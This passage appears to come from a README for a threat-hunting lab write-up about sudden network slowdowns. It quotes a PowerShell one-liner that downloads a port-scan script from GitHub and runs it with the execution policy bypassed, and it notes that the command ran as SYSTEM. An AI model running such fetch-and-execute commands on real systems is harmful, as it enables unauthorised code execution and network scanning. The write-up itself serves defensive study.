fesguerra143/sudden-network-slowdowns/README.md

 Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/joshmadakor1/lognpacific-public/refs/heads/main/cyber-range/entropy-gorilla/portscan.ps1' -OutFile 'C:\programdata\portscan.ps1';cmd /c powershell.exe -ExecutionPolicy Bypass -File C:\programdata\portscan.ps1

 ```

-Account:
-Executed by SYSTEM — not expected behavior; not triggered by any admin.

 I logged into the suspect computer and observed the powershell script that was used to conduct the port scan: